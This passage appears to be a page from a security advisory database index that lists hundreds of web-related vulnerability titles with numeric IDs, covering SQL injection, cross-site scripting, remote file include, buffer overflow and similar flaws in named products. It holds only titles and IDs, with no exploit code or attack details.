Web Browser ActiveX Control Remote Code Execution Vulnerability [22748] Webmin Chooser.CGI Multiple Cross-Site Scripting Vulnerabilities [22726] WebMplayer Multiple Input Validation Vulnerabilities [22711] PHPWebGallery Multiple Scripts Multiple Cross-Site Scripting Vulnerabilities [22701] Multiple Web Browser UTF-7 Cross-Domain Character-Set-Inheritance Vulnerability [22691] WebAPP Multiple Vulnerabilities [22681] J-Web Pics Navigator Jwpn-Photos.PHP Directory Traversal Vulnerability [22672] InstallFromTheWeb Multiple Unspecified Buffer Overflow Vulnerabilities [22659] WebSpell Printview.PHP SQL Injection Vulnerability [22590] Ezboo Webstats Administrative Authentication Bypass Vulnerability [22563] Webapp.Org Webapp Multiple Remote Vulnerabilities [22559] WebTester Multiple Input Validation Vulnerabilities [22557] MiniWebSVR Multiple Request Remote Denial of Service Vulnerability [22554] MailEnable Web Mail Client Multiple HTML Injection and Cross-Site Scripting Vulnerabilities [22541] WebSpell ShowOnly Parameter SQL Injection Vulnerability [22523] Miniwebsvr Web Server Directory Traversal Vulnerability [22502] Plain Old Webserver Firefox Extension Directory Traversal Vulnerability [22455] Cpanel Web Hosting Manager OBJCache.PHP Remote File Include Vulnerability [22444] WebMatic Index_Album.PHP Multiple Remote File Include Vulnerabilities [22361] PHP Web Portail Includes.PHP Remote File Include Vulnerability [22294] WebGUI Asset Deletion Security Bypass Vulnerability [22291] WebFWLog Debug.PHP Information Disclosure Vulnerability [22282] SpoonLabs Vivvo Article Management CMS Show_Webfeed.PHP SQL Injection Vulnerability [22243] CGI Rescue WebForm Multiple Input Validation Vulnerabilities [22234] Hitachi Web Server Multiple Vulnerabilities [22192] Sun Ray Server Admin Graphical User Interface Administrator Password Disclosure Vulnerabilities [22185] Atozed Software Intraweb Component HTTP Request Handling Remote Denial of Service Vulnerability [22184] Symantec Web Security Multiple Denial of Service And Cross-Site Scripting Vulnerabilities [22182] Mini Web Server Unspecified Multiple Buffer Overflow Vulnerabilities [22176] EWebQuiz EWebQuiz.ASP SQL Injection Vulnerability [22153] WebChat Defines.PHP Remote File Include Vulnerability [22149] WebSpell Gallery.PHP SQL Injection Vulnerability [22133] DivX Web Player NPDIVX32.DLL ActiveX Control Remote Denial of Service Vulnerability [22114] WebGUI Registration Username HTML Injection Vulnerability [22090] Twilight Webserver Remote Denial Of Service Vulnerability [22089] IBM WebSphere Multiple Remote Vulnerabilities [22060] Okul Web Otomasyon Sistemi Etkinlikbak.ASP SQL Injection Vulnerability [22059] Apple WebKit WebCore Remote Denial of Service Vulnerability [22051] WebGUI Wiki Title Cross-Site Scripting Vulnerability [22040] FdWeB Espace Membre Admin_Menu.PHP Remote File Include Vulnerability [21977] iPlanet Web Server Search Module Cross-Site Scripting Vulnerability [21965] Magic Photo Storage Website Multiple Remote File Include Vulnerabilities [21963] MOTIONBORG Web Real Estate Admin_Check_User.ASP SQL Injection Vulnerability [21955] Direct Web Rendering Multiple Remote Vulnerabilities [21928] Magic Photo Storage Website Common_Function.PHP Remote File Include Vulnerability [21927] Cuyahoga FCKEditor Web.Config Security Bypass Vulnerability [21911] OmniWeb Javascript Alert() Format String Vulnerability [21906] Fon La Fonera Router Unauthorized Web Access Vulnerability [21898] Acunetix Web Vulnerability Scanner Remote Denial of Service Vulnerability [21816] AIDeX Mini-Webserver HTTP Request Remote Denial of Service Vulnerability [21809] WebText User Profile PHP Code Injection Vulnerability [21808] Durian Web Application Server Remote Buffer Overflow Vulnerability [21787] AlstraSoft Web Host Directory Administrator Password Change Vulnerability [21752] Retired: Enthrallweb eHomes Result.ASP SQL Injection Vulnerability [21750] Enthrallweb ePages Actualpic.ASP SQL Injection Vulnerability [21748] Enthrallweb eCars Types.ASP SQL Injection Vulnerability [21742] Enthrallweb ePhotos SubLevel2.ASP SQL Injection Vulnerability [21739] EnthrallWeb Multiple Products Myprofile.ASP Arbitrary User Password Change Vulnerability [21712] HTTP Explorer Web Server Directory Traversal Vulnerability [21711] Slooze PHP Web Photo Album Authorization Bypass Vulnerability [21708] Calacode @Mail Webmail Filtering Engine HTML Injection Vulnerability [21684] Web-App.Org and Web-App.Net Multiple Input Validation Vulnerabilities [21678] Novell NetWare Welcome Web-App Unspecified Cross-Site Scripting Vulnerability [21677] Mini Web Shop View.PHP Viewcategory.PHP Cross-Site Scripting Vulnerability [21636] IBM WebSphere Application Server Multiple Remote Vulnerabilities [21625] Bandwebsite Unauthorized Administrative Account Creation Vulnerability [21622] MXBB Web Links Module MX_Root_Path Remote File Include Vulnerability [21614] WeBWorK Program Generation Language Macro Security Restriction Bypass Vulnerability [21608] IBM WebSphere Utility Classes Unspecified Vulnerability [21544] Barman Interface.PHP Remote File Include Vulnerability [21540] IBM WebSphere Host On-Demand Authentication Bypass Vulnerability [21498] Web Hosting Manager Multiple Cross-Site Scripting Vulnerabilities [21325] MailEnable WebAdmin Unauthorized Access Vulnerability [21288] WebHost Manager Multiple Cross-Site Scripting Vulnerabilities [21274] Wallpaper Complete Website Wallpaper.PHP SQL Injection Vulnerability [21270] Recipes Complete Website SQL Injection Vulnerabilities [21238] My Little Weblog Weblog.php Cross-Site Scripting Vulnerability [21204] IBM WebSphere Application Server Prior to 6.1.0.3 Multiple Vulnerabilities [21193] Enthrallweb EHomes Multiple Input Validation Vulnerabilities [21192] Enthrallweb EClassifieds Multiple SQL Injection Vulnerabilities [21178] phpWebThings Editor.PHP Remote File Include Vulnerabilities [21158] BestWebApp Dating Site Multiple Input Validation Vulnerabilities [21151] Enthrallweb EShopping Cart Mutiple SQL Injection Vulnerabilities [21123] Kerio WebStar Local Privilege Escalation Vulnerability [21100] Biba Selenium Web Server Multiple Vulnerabilities [21092] Web Inhabit A+ Store E-Commerce Input Validation Vulnerabilities [21076] WWWeb Cocepts CactuShop Multiple SQL Injection Vulnerabilities [21042] Roundcube Webmail index.PHP Cross-Site Scripting Vulnerability [21028] ELOG Web Logbook ELogD Server Denial Of Service Vulnerability [21018] IBM WebSphere Faultactor Cross-Site Scripting Vulnerability [20969] FreeWebShop Multiple Input Validation Vulnerabilities [20937] Webdrivers Simple Forum Message_details.PHP SQL Injection Vulnerability [20910] Essentia Web Server GET And HEAD Requests Remote Buffer Overflow Vulnerability [20888] FreeWebShop Index.PHP Directory Traversal Vulnerability [20887] FreeWebShop Index.PHP SQL Injection Vulnerability [20877] SAP Web Application Server Remote Information Disclosure Vulnerability [20873] SAP Web Application Server Remote Denial of Service Vulnerability [20861] EFS Easy Address Book Web Server Data Parameter Multiple Cross-Site Scripting Vulnerabilities [20840] Mirapoint Web Mail Expression() HTML Injection Vulnerability [20827] BlooMooWeb ActiveX Control Multiple Vulnerabilities [20825] Easy Web Portal Multiple Remote File Include Vulnerabilities [20823] Easy File Sharing Web Server Information Disclosure and Input Validation Vulnerabilities [20787] Simple Website Software Common.PHP Remote File Include Vulnerability [20778] Web Wiz Forum Search.ASP SQL Injection Vulnerability [20743] MiniHTTPServer Web Forum and File Sharing Server Add User Authentication Bypass Vulnerability [20708] Sun Java System/iPlanet Messaging Server Webmail JavaScript Injection Vulnerability [20687] MDWeb Multiple Remote File Include Vulnerabilities [20662] Trawler Web CMS Multiple Remote File Include Vulnerabilities [20653] Web Group Communication Center Quiz.PHP SQL Injection Vulnerability [20605] Highwall Multiple Products Management Interface Multiple Input Validation Vulnerabilities [20591] Opera Web Browser URI Tag Parsing Heap Buffer Overflow Vulnerability [20590] Dev Web Manager System Index.PHP Cross-Site Scripting Vulnerability [20554] Webgenius Goop Gallery Index.PHP Cross-Site Scripting Vulnerability [20544] Asbru Software Web Content Editor Shell Command Execution Vulnerability [20540] WebSpell Index.PHP SQL Injection Vulnerability [20532] H-Sphere WebShell Login.PHP Cross-Site Scripting Vulnerability [20459] Asbru Web Content Management Unauthorized Remote Access Vulnerability [20455] IBM WebSphere Application Server Prior to 6.1.0.2 Multiple Vulnerabilities [20436] IronWebMail Directory Traversal Information Disclosure Vulnerability [20430] Jasmine-Web Index.PHP Remote File Include Vulnerability [20421] Webmedia Explorer Core.Lib.PHP Remote File Include Vulnerability [20412] Retired: PHPWebSite PHPWS_SOURCE_DIR Parameter Multiple Remote File Include Vulnerabilities [20406] WebYep Webyep_SIncludePath Parameter Multiple Remote File Include Vulnerabilities [20331] WEBGENEius GOOP Gallery Directory Traversal Vulnerability [20295] PHP Web Scripts Easy Banner Functions.PHP Remote File Include Vulnerability [20289] VAMP Webmail Yesno.PHTML Remote File Include Vulnerability [20281] phpMyWebmin Multiple Remote File Include Vulnerabilities [20264] phpMyWebmin Remote File Include and Information Disclosure Vulnerabilities [20250] NaviCOPA Web Server Remote Buffer Overflow Vulnerability [20239] Web//News Parser.PHP Remote File Include Vulnerability [20231] PHPSelect Web Development Index.PHP3 Remote File Include Vulnerability [20166] Web-News Template.PHP Remote File Include Vulnerability [20145] XWeblog Kategori.ASP SQL Injection Vulnerability [20119] Dr. Web Anti-Virus LHA Archive Heap Buffer-Overflow Vulnerability [20116] Business Card Web Builder Startup.Inc.PHP Remote File Include Vulnerability [20109] Neon WebMail For Java Multiple Input Validation Vulnerabilities [20107] DigitalWebShop Multiple Remote File Include Vulnerabilities [20060] Retired: Hitweb REP_CLASS Multiple Remote File Include Vulnerabilities [20054] RETIRED: Web Wiz Forums Members.ASP Cross-Site Scripting Vulnerability [19975] WebSPELL Database.PHP Authentication Bypass Vulnerability [19966] IBM Lotus Domino Web Access Session Hijacking Vulnerability [19944] MyABraCaDaWeb Base Parameter Multiple Remote File Include Vulnerabilities [19896] RETIRED: Web Server Creator Customize.PHP Remote File Include Vulnerability [19892] Web-Provence SL_Site Spaw_control.class.PHP Remote File Include Vulnerability [19842] Easy Address Book Web Server Remote Format String Vulnerability [19841] Alt-N MDaemon WebAdmin Component Unauthorized Access Vulnerability [19836] Web Dictate Admin Authentication Bypass Vulnerability [19820] Webmin and Usermin HTML Injection and Information Disclosure Vulnerability [19757] IwebNegar Comments.PHP SQL Injection Vulnerability [19744] Web3news PHPSECURITYADMIN_PATH Remote File Include Vulnerability [19737] CliServ Web Community Multiple Remote File Include Vulnerabilities [19735] AY Systems Web Content System Multiple Remote File Include Vulnerabilities [19660] SAP-DB/MaxDB WebDBM Remote Buffer Overflow Vulnerability [19631] WebAdmin Module for MDaemon Unspecified Privilege Escalation Vulnerability [19620] WebAdmin Module for MDaemon Information Disclosure Vulnerability [19569] WTCom Web Torrent SQL Injection Vulnerability [19537] WikiWebWeaver Index.PHP Arbitrary File Upload Vulnerability [19527] IBM WebSphere Application Server Prior to 6.0.2.13 Multiple Vulnerabilities [19526] WEBInsta Mailing List Manager InitDB.PHP Remote File Include Vulnerability [19511] Joomla Webring Component Admin.Webring.Docs.PHP SQL Injection Vulnerability [19496] 04WebServer Multiple Vulnerabilities [19492] Joomla Webring Remote File Include Vulnerability [19491] Opera Web Browser IRC Chat Client Remote Denial of Service Vulnerability [19489] WEBinsta CMS Templates_Dir Remote File Include Vulnerability [19477] WEBinsta Mailing List Manager Install3.PHP Remote File Include Vulnerability [19476] MyWebland miniBloggie Fname Remote File Include Vulnerability [19463] IBM WebSphere Application Server 6.1.0 Multiple Vulnerabilities [19462] Tiny Web Gallery Image Parameter Multiple Remote File Include Vulnerabilities [19459] SaveWebPortal Page Parameter Remote File Include Vulnerability [19436] Hitweb REP_INC Remote File Include Vulnerability [19433] Comet WebFileManager CheckUpload.PHP Remote File Include Vulnerability [19432] Archangel Weblog Multiple HTML Injection Vulnerabilities [19403] CA eTrust Antivirus WebScan Malicious Update Code Execution Vulnerability [19382] TurnkeyWebTools PHP Simple Shop Multiple Remote File Include Vulnerabilities [19351] CA eTrust Antivirus WebScan Remote Buffer Overflow Vulnerability [19306] SaveWeb Portal SITE_Path Parameter Multiple Remote File Include Vulnerabilities [19253] SQLiteWebAdmin Multiple Input Validation Vulnerabilities [19226] Advanced Webhost Billing System Contact.PHP Multiple Cross-Site Scripting Vulnerabilities [19221] Microsoft Windows Graphical Device Interface Plus Library Denial Of Service Vulnerability [19200] Sun Java System Application Server and Web Server Information Disclosure Vulnerability [19166] RETIRED: Opera Web Browser CSS Background URI Memory Corruption Vulnerability [19136] Checkpoint FireWall-1 Webserver Directory Traversal Vulnerability [19063] OWASP WebScarab Cross-Site Scripting Vulnerability [19030] Microsoft WebViewFolderIcon ActiveX Control Buffer Overflow Vulnerability [19007] IceWarp Web Mail Multiple File Include Vulnerabilities [18953] Cisco Router Web Setup (CRWS) Authentication Bypass Vulnerability [18947] Drupal Webform Multiple Unspecified Cross-Site Scripting Vulnerabilities [18926] Juniper Networks DX Web Login HTML Injection Vulnerability [18916] MIMESweeper For Web Access Denied Cross-site Scripting Vulnerability [18899] Webvizyon SayfalaAltList.ASP SQL Injection Vulnerability [18878] FreeWebshop Multiple Input Validation Vulnerabilities [18860] WebEx ActiveX Multiple Remote Code Execution Vulnerabilities [18822] Apple Safari Web Browser DHTML SetAttributeNode() Null Dereference Denial Of Service Vulnerability [18798] PHPWebGallery Comments.PHP Cross-site Scripting Vulnerability [18744] Webmin/Usermin Unspecifed Information Disclosure Vulnerability [18672] IBM WebSphere Application Server Multiple Remote Vulnerabilities [18613] Webmin Remote Directory Traversal Vulnerability [18612] AEwebworks Dating Software Multiple Cross-Site Scripting Vulnerabilities [18598] Open WebMail Openwebmail-read.PL Cross-Site Scripting Vulnerability [18594] Opera Web Browser JPEG Image Handling Remote Buffer Overflow Vulnerability [18578] IBM Websphere Application Server Prior to 6.0.2.11 Multiple Vulnerabilities [18564] WeBBoA ID Parameter SQL Injection Vulnerability [18521] WebWasher Remote ARJ Decoder Denial of Service Vulnerability [18492] Mambo Weblinks SQL Injection Vulnerability [18434] WebFORM and FORM2MAIL Open Email Relay Vulnerability [18419] Cisco VPN3K/ASA WebVPN Clientless Mode Cross-Site Scripting Vulnerability [18406] aWebNews Visview.PHP Remote File Include Vulnerability [18386] Adaptive Website Framework Remote File Include Vulnerability [18381] Microsoft Exchange Server Outlook Web Access Script Injection Vulnerability [18378] WebprojectDB Multiple Remote File Include Vulnerabilities [18308] Multiple Vendor Web Browser JavaScript Key Filtering Vulnerability [18301] TIBCO Rendezvous HTTP Interface Remote Buffer Overflow Vulnerability [18300] TIBCO Hawk Configuration Interface Local Buffer Overflow Vulnerability [18260] WebspotBlogging Multiple Remote File Include Vulnerabilities [18248] Ashwebstudio Ashnews Multiple Remote File Include Vulnerabilities [18240] Weblog Oggi Index.PHP HTML Injection Vulnerability [18235] aspWebLinks Links.ASP SQL Injection Vulnerability [18201] F-Secure Multiple Products Web Console Buffer Overflow Vulnerability [18175] WebCalendar Index.PHP Information Disclosure Vulnerability [18161] EVA-Web Multiple Cross-Site Scripting Vulnerabilities [18151] F@cile Interactive Web P-Themes Cross-Site Scripting Vulnerability [18149] F@cile Interactive Web Multiple Remote File Include Vulnerabilities [18144] Eitsop My Web Server Remote Denial of Service Vulnerability [18106] PunkBuster WebTool WebKey Parameter Remote Buffer Overflow Vulnerability [18091] Apple Xcode Tools WebObjects Unauthorized Remote Access Vulnerability [18070] Destiney Rated Images Addweblog.PHP HTML Injection Vulnerability [18041] JemWeb DownloadControl DC.PHP SQL Injection Vulnerability [18006] SAP Web Application Server Input Validation Vulnerability [17995] IceWarp Universal WebMail PHPSESSID Parameter Cross-Site Scripting Vulnerability [17982] BEA WebLogic Multiple Vulnerabilities [17956] Web-Labs CMS Multiple Cross-Site Scripting Vulnerabilities [17919] IBM WebSphere Application Server Multiple Vulnerabilities [17900] IBM WebSphere Application Server Welcome Page Security Restriction Bypass Vulnerability [17883] Multiple Cisco Products WebSense Content Filtering Bypass Vulnerability [17868] Website Baker User Display Name HTML Injection Vulnerability [17858] Xeneo Web Server Source Disclosure Vulnerability [17853] WebCalendar Username Enumeration Vulnerability [17834] Bigwebmaster Guestbook Multiple HTML Injection Vulnerabilities [17744] Blog Mod Weblog_posting.PHP SQL Injection Vulnerability [17737] SWS Web Server Multiple Arbitrary Code Execution Vulnerabilities [17688] PHPWebFTP Multiple Cross-Site Scripting Vulnerabilities [17674] Apple Safari Web Browser Rowspan Denial Of Service Vulnerability [17641] Asterisk Recording Interface Audio.PHP Information Disclosure Vulnerability [17630] Manic Web MWGuest MWguest.PHP HTML Injection Vulnerability [17557] PHPWebFTP Index.PHP Directory Traversal Vulnerability [17536] Tiny Web Gallery Index.PHP Cross-Site Scripting Vulnerability [17521] PHPWebSite Config.PHP File Include Vulnerability [17513] Opera Web Browser Stylesheet Attribute Buffer Overflow Vulnerability [17425] APT-webshop Modules.PHP Multiple SQL Injection Vulnerabilities [17421] PHPWebGallery Multiple Cross-Site Scripting Vulnerabilities [17418] TalentSoft Web+ Shop Deptname Parameter Cross-Site Scripting Vulnerability [17417] AWeb's Scripts Seller Buy.PHP Authorization Bypass Vulnerability [17416] AWeb's Banner Generator Cross-Site Scripting Vulnerability [17412] Manic Web MWNewsletter Multiple Input Validation Vulnerabilities [17408] Cherokee Webserver Cross-Site Scripting Vulnerability [17359] Web-App.Org and Web-App.Net Multiple Cross-Site Scripting Vulnerabilities [17352] AWebBB Multiple Input Validation Vulnerabilities [17337] Hitachi Groupmax World Wide Web Unspecified Cross-Site Scripting Vulnerability [17270] Blazix Java Application/Web Server JSP Source Disclosure Vulnerability [17263] Web Host Automation Ltd. Helm Multiple Cross-Site Scripting Vulnerabilities [17247] Maian Weblog Multiple SQL-Injection Vulnerabilities [17228] WEBalbum Remote Command Execution Vulnerability [17222] Pablo Software Solutions Baby Web/Quick 'n Easy Web ASP Source Disclosure Vulnerability [17212] Webcheck Username HTML Injection Vulnerability [17193] 1WebCalendar Multiple SQL Injection Vulnerabilities [17190] Motorola Bluetooth Interface Dialog Spoofing Vulnerability [17168] WebLogic Server and WebLogic Express Invalid Login Attempts Weakness [17167] BEA WebLogic Server Remote Denial Of Service Vulnerability [17166] BEA WebLogic Server Remote Filesystem Access Vulnerability [17164] BEA WebLogic Portal JSR-168 Portlets Information Disclosure Vulnerability [17163] BEA WebLogic Server and WebLogic Express HTTP Response Splitting Vulnerability [17161] MailEnable Enterprise/Professional Editions Webmail Denial of Service Vulnerability [17159] Maian Weblog Multiple SQL Injection Vulnerabilities [17150] PHPWebSite Multiple SQL Injection Vulnerabilities [17140] BorderWare MXtreme Web Administration Unspecified Remote Vulnerability [17046] Easy File Sharing Web Server Multiple Input Validation Vulnerabilities [17032] Micromuse Netcool/NeuSecure Website NS Account Password Disclosure Vulnerability [16912] UKiWEB UKiBoard FCE.PHP BBCode HTML Injection Vulnerability [16908] IBM WebSphere Application Server JSP Source Code Disclosure Vulnerability [16895] NetworkActiv Web Server Remote Script Disclosure Vulnerability [16848] Archangel Weblog Authentication Bypass Vulnerability [16829] iGenus WebMail Config_Inc.PHP Remote File Include Vulnerability [16825] PHPWebSite Topics.PHP SQL Injection Vulnerability [16823] FreeHostShop Website Generator Arbitrary File Upload Vulnerability [16812] DEV Web Management System HTML Injection Vulnerability [16811] WEBInsta Limbo HTML Injection Vulnerability [16793] NOCC Webmail Multiple Input Validation Vulnerabilities [16789] Web Calendar Pro Dropbase.PHP SQL Injection Vulnerability [16742] McAfee Webshield SMTP Remote Format String Vulnerability [16721] Webpagecity WPC easy SQL Injection Vulnerability [16719] E107 Website System Chatbox Plugin HTML Injection Vulnerability [16706] V-webmail Multiple Cross-Site Scripting Vulnerabilities [16673] WebSPELL Search.PHP SQL Injection Vulnerability [16636] Microsoft Windows Web Client Buffer Overflow Vulnerability [16614] E107 Website System BBCode HTML Injection Vulnerability [16612] WebGUI User Creation Security Bypass Vulnerability [16610] Noweb Insecure Temporary File Creation Vulnerability [16579] ELOG Web Logbook Multiple Remote Vulnerabilities [16544] Webeveyn Whomp! Real Estate Manager Login SQL Injection Vulnerability [16542] WiredRed E/POP Web Conferencing HTML Injection Vulnerability [16540] Sun Java Web Start Untrusted Application Unauthorized Access Vulnerability [16444] PunctWeb MyCO Name Field HTML Injection Vulnerability [16436] AshWebStudio AshNews Remote File Include Vulnerability [16426] Ashwebstudio Ashnews Cross-Site Scripting Vulnerability [16391] Phpclanwebsite Multiple Input Validation Vulnerabilities [16385] Kerio WinRoute Firewall Web Browsing Unspecified Denial of Service Vulnerability [16371] WeBWorK Remote Arbitrary Command Execution Vulnerability [16358] BEA WebLogic Multiple Vulnerabilities [16319] WebspotBlogging Login.PHP SQL Injection Vulnerability [16315] ELOG Web Logbook Multiple Remote Input Validation Vulnerabilities [16302] Douran FollowWeb Portal Register.ASPX Cross-Site Scripting Vulnerability [16300] Phpclanwebsite BBCode IMG Tag Script Injection Vulnerability [16277] WebMobo WBNews Comments.PHP HTML Injection Vulnerability [16234] Web Host Automation Ltd. Helm ForgotPassword.ASP Cross-Site Scripting Vulnerability [16215] BEA WebLogic Server and WebLogic Express MBean Remote Information Disclosure Vulnerability [16199] Orjinweb Index.PHP Remote File Include Vulnerability [16196] WebWiz Forums Search_form.ASP Cross-Site Scripting Vulnerability [16194] Microsoft Windows Embedded Web Font Buffer Overflow Vulnerability [16175] SysCP WebFTP Module Local File Include Vulnerability [16161] TheWebForum Multiple Input Validation Vulnerabilities [16113] Chimera Web Portal Multiple Input Validation Vulnerabilities [16107] VEGO Web Forum Theme_ID SQL Injection Vulnerability [16086] VMWare ESX Server Management Interface HTML Injection Vulnerability [16085] Web Wiz Multiple Products SQL Injection Vulnerability [16069] IceWarp Universal WebMail Multiple Input Validation Vulnerabilities [16063] Dev Web Management System Multiple Input Validation Vulnerabilities [16052] Real Web Solution Statistics Counter Service SQL Injection Vulnerability [16047] WebWasher Malicious Script Filter Bypass Vulnerability [16038] Lois Software WebDB Search Module SQL Injection Vulnerability [15982] Clearswift MIMEsweeper For Web Executable File Bypass Vulnerability [15948] Hot Banana Web Content Management Suite Cross-Site Scripting Vulnerability [15937] Adaptive Website Framework Cross-Site Scripting Vulnerability [15932] ELOG Web Logbook Multiple Remote Buffer Overflow Vulnerabilities [15929] IBM WebSphere Application Server Sample Scripts Multiple HTML Injection Vulnerabilities [15920] Round Cube Webmail Path Disclosure Weakness [15917] WebCal Multiple HTML Injection and Cross-Site Scripting Vulnerabilities [15916] WebGlimpse Cross-Site Scripting Vulnerability [15877] MarmaraWeb E-Commerce Remote File Include Vulnerability [15875] MarmaraWeb E-Commerce Cross-Site Scripting Vulnerability [15847] PHP Web Scripts Ad Manager Pro Advertiser_statistic.PHP SQL Injection Vulnerability [15837] PHPWebGallery Multiple SQL Injection Vulnerabilities [15835] Opera Web Browser Download Dialog Manipulation File Execution Vulnerability [15819] BTGrup Admin WebController SQL Injection Vulnerability [15813] Opera Web Browser Long Title Element Bookmark Denial of Service Vulnerability [15776] Website Baker SQL Injection Vulnerability [15772] Sun Solaris Sun Update Connection Web Proxy Password Disclosure Vulnerability [15748] e107 Website System Voting Manipulation Vulnerability [15718] Web4Future Portal Solutions Arhiva.PHP Directory Traversal Vulnerability [15717] Web4Future Affiliate Manager PRO Functions.PHP SQL Injection Vulnerability [15716] Web4Future Portal Solutions Comentarii.PHP SQL Injection Vulnerability [15715] Web4Future eDating Professional Multiple SQL Injection Vulnerabilities [15707] Web4Future eCommerce Enterprise Edition Multiple SQL Injection Vulnerabilities [15702] Web4Future KeyWord Frequency Counter Cross-Site Scripting Vulnerability [15673] WebCalendar Layers_Toggle.PHP HTTP Response Splitting Vulnerability [15662] WebCalendar Multiple SQL Injection Vulnerabilities [15608] WebCalendar Export_Handler.PHP File Corruption Vulnerability [15606] WebCalendar Multiple SQL Injection Vulnerabilities [15603] PHP Web Statistik Content Injection Vulnerabilities [15601] FreeWebStat Multiple Cross-Site Scripting Vulnerabilities [15587] AllWeb Search SQL Injection Vulnerability [15574] Athena PHP Website Administration Remote File Include Vulnerability [15561] Softbiz Web Host Directory Script Multiple SQL Injection Vulnerabilities [15522] IBM WebSphere Application Server for z/OS Double Free Denial of Service Vulnerability [15521] Opera Web Browser Arbitrary Command Execution Vulnerability [15472] Opera Web Browser HTML Form Status Bar Misrepresentation Vulnerability [15465] PHPWebThings MSG Parameter SQL Injection Vulnerability [15399] PHPWebThings Download.PHP File Parameter SQL Injection Vulnerability [15362] SAP Web Application Server URI Redirection Vulnerability [15361] SAP Web Application Server Multiple Cross-Site Scripting Vulnerabilities [15360] SAP Web Application Server HTTP Response Splitting Vulnerability [15331] Multiple Vendor Web Browser Cookie Hostname Handling Weakness [15303] IBM WebSphere Application Server QueryString Information Disclosure Vulnerability [15284] F-Secure Web Console Directory Traversal Vulnerability [15281] Asus VideoSecurity Online Web Server Directory Traversal Vulnerability [15279] Asus VideoSecurity Online Web Server Authentication Buffer Overflow Vulnerability [15277] PHPWebThing Forum.PHP SQL Injection Vulnerability [15276] phpWebThings Forum.PHP Cross-Site Scripting Vulnerability [15225] Hasbani Web Server Malformed HTTP GET Request Remote Denial of Service Vulnerability [15188] Symantec Discovery Web Accounts Default Password Vulnerability [15171] eBASEweb Unspecified SQL Injection Vulnerability [15124] Opera Web Browser Multiple Malformed HTML Parsing Denial Of Service Vulnerabilities [15107] RTasarim WebAdmin Login SQL Injection Vulnerability [15088] PHPWebSite Search Module SQL Injection Vulnerability [15083] WebGUI Arbitrary Command Execution Vulnerability [15079] VERITAS NetBackup Java User-Interface Remote Format String Vulnerability [15064] Microsoft Windows Explorer Web View Script Injection Vulnerability [15052] BEA WebLogic Server and WebLogic Express Multiple Vulnerabilities [15016] Webroot Software Desktop Firewall Multiple Local Vulnerabilities [15011] IBM Tivoli Monitoring Web Health Console Multiple Denial of Service Vulnerabilities [14991] Virtools Web Player Directory Traversal Vulnerability [14990] Virtools Web Player Buffer Overflow Vulnerability [14986] IceWarp Web Mail Directory Traversal Vulnerability [14981] 4D WebStar Remote IMAP Denial of Service Vulnerability [14970] Polipo Web Root Restriction Bypass Vulnerability [14956] CJ Web2Mail Multiple Cross-Site Scripting Vulnerabilities [14889] Webmin / Usermin Remote PAM Authentication Bypass Vulnerability [14884] Opera Web Browser Unspecified Drag And Drop File Upload Vulnerability [14880] Opera Web Browser Mail Client Multiple Vulnerabilities [14862] Content2Web Multiple Input Validation Vulnerabilities [14847] AEwebworks aeDating Search_Result.PHP SQL Injection Vulnerability [14841] Cambridge Computer Corporation VxWeb Remote Buffer Overflow Vulnerability [14823] Sun Java System Application Server Web Application JAR Disclosure Vulnerability [14812] Ingate Administrative Interface Cross-Site Scripting Vulnerability [14788] Sun Java System Web Proxy Server Unspecified Remote Denial Of Service Vulnerability [14776] Stylemotion WEB//NEWS Multiple SQL Injection Vulnerabilities [14771] Open WebMail OpenWebmail-main.PL Cross-Site Scripting Vulnerability [14764] Microsoft IIS WebDAV HTTP Request Source Code Disclosure Vulnerability [14760] CSystems WebArchiveX ActiveX Component Arbitrary File Read and Write Vulnerabilities [14747] Man2web Multiple Scripts Command Execution Vulnerability [14744] SqWebMail HTML Email Script Tag Script Injection Vulnerability [14732] Plain Black Software WebGUI Remote Perl Command Execution Vulnerabilities [14717] Multiple Vendor Web Vulnerability Scanners HTML Injection Vulnerability [14679] PHPWebNotes Api.PHP Remote File Include Vulnerability [14676] SqWebMail HTML Email IMG Tag Script Injection Vulnerability [14658] Foojan PHPWeblog Html Injection Vulnerability [14657] BEA WebLogic Administration Console Cross-Site Scripting Vulnerability [14651] WebCalendar Send_Reminders.PHP Remote File Include Vulnerability [14650] SqWebMail File Attachment Script Injection Vulnerability [14643] SaveWebPortal Multiple Directory Traversal Vulnerabilities [14642] SaveWebPortal Multiple Cross Site Scripting Vulnerabilities [14641] SaveWebPortal Multiple Remote File Include Vulnerabilities [14639] SaveWebPortal Unauthorized Access Vulnerability [14632] BEA WebLogic Portal Access Validation Vulnerability [14586] Xerox MicroServer Web Server Multiple Authentication Bypass and Input Validation Vulnerabilities [14569] Apple Mac OS X Weblog Server Cross-Site Scripting Vulnerabilities [14528] Apple Safari Web Browser JavaScript Invalid Address Denial Of Service Vulnerability [14512] Microsoft Internet Explorer Web Folder Behaviors Cross-Domain Scripting Vulnerability [14495] E107 Website System Attached File Cross-Site Scripting Vulnerability [14488] Acunetix Web Vulnerability Scanner Remote Denial of Service Vulnerability [14473] NetworkActiv Web Server Cross-Site Scripting Vulnerability [14465] Web Content Management Administrator Account Unauthorized Access Vulnerability [14464] Web Content Management Multiple Cross-Site Scripting Vulnerabilities [14455] Metasploit Framework MSFWeb Defanged Mode Restriction Bypass Vulnerability [14410] Opera Web Browser Image Dragging Cross-Domain Scripting and File Retrieval Vulnerability [14409] Thomson Web Skill Vantage Manager SQL Injection Vulnerability [14406] Website Baker Arbitrary File Upload Vulnerability [14404] Website Baker Browse.PHP Cross-Site Scripting Vulnerability [14402] Opera Web Browser Content-Disposition Header Download Dialog File Extension Spoofing Vulnerability [14388] IBM Lotus Domino WebMail Information Disclosure Vulnerability [14385] SPI Dynamics WebInspect Cross Application Script Injection Vulnerability [14363] Beehive Forum Webtag Multiple Cross-Site Scripting Vulnerabilities [14361] Beehive Forum Webtag Multiple SQL Injection Vulnerabilities [14341] DXXO Count Web Statistics Multiple SQL Injection Vulnerabilities [14338] Website Generator Multiple Remote Cross Site Scripting Vulnerabilities [14337] Website Generator Remote Code Execution Vulnerability [14310] Novell GroupWise WebAccess HTML Injection Vulnerability [14301] e107 Website System Nested BBCode URL Tag Script Injection Vulnerability [14279] Oracle Webcache SSL Encryption Downgrade Weakness [14249] ESi WebEOC Multiple Input Validation Privilege Escalation and Denial of Service Vulnerabilities [14248] Clearswift MIMEsweeper For Web ActiveX Bypass Vulnerability [14207] Web Wiz Forums Information Disclosure Vulnerability [14192] 4D WebStar Unspecified Vulnerability [14172] PHPWebSite Index.PHP Multiple SQL Injection Vulnerabilities [14166] PHPWebSite Index.PHP Directory Traversal Vulnerability [14118] Webmatic Unspecified Vulnerabilities [14083] Dynamic Biz Website Builder 